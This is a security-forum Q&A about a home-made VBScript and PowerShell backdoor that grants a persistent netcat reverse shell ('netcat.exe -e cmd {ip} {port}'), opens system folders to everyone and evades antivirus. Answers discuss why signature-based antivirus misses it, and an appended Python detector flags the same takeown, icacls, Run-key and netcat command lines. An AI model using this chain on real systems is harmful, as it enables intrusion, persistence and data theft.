
I am quite new to this type of stuff and I'm experimenting a little bit. This weekend I had some spare time and decided to joke around with VBScript and PowerShell. What I did is I wrote a VBScript which can be run as a normal user or as administrator and does the following when run:

  1. Creates a .bat script, inserts the code manually into the script line by line and then executes it. The .bat contains:

    • A takeown command for system32 and sysWOW64 (if run as administrator, of course)
    • An icacls command that makes the above folders modifiable by anyone
    • Runs the previously created PowerShell script
    • Adds a .vbs in the local machine registry to run at startup as SYSTEM
  2. Creates a PowerShell script and inserts the code manually into the script line by line. The .ps1 contains:

    • First it downloads netcat
    • Then it unzips the downloaded file
    • Then it grabs the system's username and public IP
    • Sends the data via SMTP to a specified email address
    • Finally it executes netcat.exe with the arguments: "netcat.exe -e cmd {listening server's public ip} {port}"
  3. Creates another .vbs and inserts the code manually line by line (this will run on startup, as stated in the .bat). The .vbs contains:

    • A do-while loop that every 5 minutes runs a .bat file containing "netcat.exe -e cmd {listening server's public ip} {port}" as its command (so I can have a persistent backdoor)
  4. A .bat file that contains only one command:

    • "netcat.exe -e cmd {listening server's public ip} {port}"
  5. Runs the .bat in the background, hidden from the user

On the "attacker" side I have netcat listening on the specified port. I was able to get an elevated cmd without triggering any AV (tested with Avira and ESET).

This works on Windows 7, 8 and 10 x64, and I made it support both PowerShell v. <3 and v. >3.

What I achieved is an elevated cmd with persistence without triggering AV detection, and it seemed very easy to achieve.

Should this have been detected as a potential threat by the antivirus software and removed from the system? I am able to accomplish remote code execution and gain full access to the target system.

This project was executed in a local environment which I own. I have no intentions of anything else.

Asked by Anonymous, edited by schroeder
  • `Dim WinScriptHost : Set WinScriptHost = CreateObject("WScript.Shell") : WinScriptHost.Run Chr(34) & NewPath & Chr(34), 0 : Set WinScriptHost = Nothing` is used for running the files hidden from the user in the background. The only reason I didn't share the source code is to prevent people from exploiting it. Edited question to be more precise – Anonymous Jan 22 '18 at 13:17
  • So, you download something, unpack it, send emails, write files, then execute a binary. What is there to detect? Users do this all the time in normal operation. I think the real issue here is just how limited AV is. What you would need is a HIDS system that analyses *behaviours*. – schroeder Jan 22 '18 at 13:48
  • I removed all parts asking for comments and critiques on your coding approach (off-topic) – schroeder Jan 22 '18 at 13:51
  • Well, for example, when I tried to download and unpack the files directly from the .vbs script, the same second I saved the code it got instantly deleted by my AV and marked as trojan.downloader. – Anonymous Jan 22 '18 at 13:53
  • The main thing was that I was very curious whether it was that easy to achieve RCE with persistence without raising any suspicion, not that I am some kind of "hacking" guru that beat the system and now I want to brag about it. – Anonymous Jan 22 '18 at 13:56
  • This isn't malware, it's simply a persistent backdoor – CaffeineAddiction Jan 22 '18 at 14:19

2 Answers


I think your issue is with the concept behind malware. Malware is software that does more than you expect it to do, or software that does what you don't want it to do.

If I make a piece of software that deletes everything on my computer, it's not malware, it's legit: I want that to happen.

If I give it to a friend and tell him: "Hey, check out this funny little game", he'll come to me (punch me in the face) and ask: why did you send me malware?!

So it all depends on the context. You made a piece of software that does legit stuff. What you are trying to achieve with it will make it malware or not.

As for your edit: I'm not an expert on AV, but from what I know, they look for patterns. Writing your own malware/virus with only legit code would make it almost undetectable, because you are not using any pattern the AV knows. The point here is that you don't use any breach; there are no security exploits. You are not exceeding your rights, nor exiting any application's scope. You've just created a tool to connect to another computer and execute commands.

I would take the example of the recent Meltdown and Spectre exploits. They are very dangerous not because, at this time, no AV knows how to detect them, but because AV would likely never know how to detect them, because it is 100% legit code. Because it is 100% legit, there are infinite ways to write an exploit, and so no patterns would come up.


Short answer: yes it is that easy, but it is not a surprise, either.

What makes malware dangerous is not what it does, but how it does it. Opening files, writing files, downloading things, opening network connections. A video game does all those things. None of them is inherently "bad".

Your "malware" has several non-malware points that allow it to evade AV detection:

  • it's a pure binary that can be identified in the task manager
  • it leaves a lot of artefacts around
  • a directly connected shell

A manual inspection will turn these things up, and some of those things will even be logged. It's not "stealthy". Stealthy code is what AV tends to look for (like your trojan horse incident).

That's why ransomware hit so hard when it arrived. It didn't need to be stealthy or even clever.

What you need, in your case, is something to analyse behaviour. Should PowerShell be doing these things? Is the code signed? Is netcat a valid binary to run? Behaviour analysis looks at the context of innocuous actions to determine whether they should be classified as malicious.

So, no, no one is surprised that AV didn't catch these things. But, it's not designed to.

schroeder
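As an added illustration of the behaviour analysis this answer describes (and of the "HIDS that analyses behaviours" schroeder mentions in the comments), the following Python triage routine is not code from the question or from either answer. It runs a handful of context rules over constructed process-creation records shaped like the chain in the question: ACL changes on protected directories, a Run key pointing at a script file, a process handed `cmd` via `-e`, and a script host spawning an unsigned network tool. The record layout, the rule names, the tool list and the documentation IP address in the sample are all assumptions made for this example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (constructed; modelled loosely on Sysmon Event ID 1 fields)."""
    parent: str          # image name of the parent process
    image: str           # image name of the new process
    cmdline: str         # full command line
    signed: bool = True  # whether the image carries a valid Authenticode signature


# Assumed lists; a real deployment would tune these to the environment.
SYSTEM_DIRS = ("\\windows\\system32", "\\windows\\syswow64")
RUN_KEY = "\\currentversion\\run"          # substring also covers RunOnce
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
NETWORK_TOOLS = {"nc.exe", "netcat.exe", "ncat.exe"}
BROAD_PRINCIPALS = r"(everyone|\*s-1-1-0|users|authenticated users|builtin\\users)"


def analyse(ev: ProcEvent) -> list:
    """Return the list of behaviour findings for a single event (empty if nothing stands out)."""
    cmd = ev.cmdline.lower()
    img = ev.image.lower()
    parent = ev.parent.lower()
    findings = []

    # Rule 1: takeown/icacls pointed at a protected Windows directory.
    if img in ("takeown.exe", "icacls.exe") and any(d in cmd for d in SYSTEM_DIRS):
        findings.append(f"acl-tamper: {img} run against a protected system directory")

    # Rule 2: icacls granting rights to a broad principal (system files become world-writable).
    if img == "icacls.exe" and re.search(r"/grant(:r)?\s+" + BROAD_PRINCIPALS, cmd):
        findings.append("acl-broad-grant: icacls granting a broad principal")

    # Rule 3: autorun persistence whose target is a script file rather than a signed binary.
    if img == "reg.exe" and RUN_KEY in cmd and re.search(r"\.(vbs|vbe|js|jse|bat|cmd|ps1)\b", cmd):
        findings.append("autorun-script: Run key value points at a script file")

    # Rule 4: any process handed cmd.exe through an '-e' argument (shell bound to a socket).
    if re.search(r"(^|\s)-e\s+cmd(\.exe)?(\s|$)", cmd):
        findings.append("bound-shell: '-e cmd' argument on the command line")

    # Rule 5: a script host spawning a known network tool or an unsigned binary.
    if parent in SCRIPT_HOSTS and (img in NETWORK_TOOLS or not ev.signed):
        findings.append(f"script-spawn: {parent} started {img} (signed={ev.signed})")

    return findings


def triage(events) -> list:
    """Return [(image, findings)] for every event that raised at least one finding."""
    hits = []
    for ev in events:
        found = analyse(ev)
        if found:
            hits.append((ev.image, found))
    return hits


# Constructed sample log: two benign lines plus the chain described in the question.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\alice\notes.txt"),
    ProcEvent("cmd.exe", "takeown.exe", r"takeown /f C:\Windows\System32 /r /a"),
    ProcEvent("cmd.exe", "icacls.exe", r"icacls C:\Windows\System32 /grant Everyone:(OI)(CI)F /t"),
    ProcEvent("cmd.exe", "reg.exe",
              r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v svc /d C:\ProgramData\run.vbs"),
    ProcEvent("powershell.exe", "netcat.exe", "netcat.exe -e cmd 203.0.113.10 4444", signed=False),
    ProcEvent("explorer.exe", "chrome.exe", "chrome.exe --profile-directory=Default"),
]

if __name__ == "__main__":
    for image, found in triage(SAMPLE_EVENTS):
        print(image)
        for f in found:
            print("   ", f)
```

None of the individual rules keys on a file hash or a byte pattern, which is the point: each action is legitimate on its own, and it is the combination (ACL tampering, a script-based autorun, a shell bound to a network tool spawned from PowerShell) that a behaviour-based sensor reports, while the two benign records produce no findings.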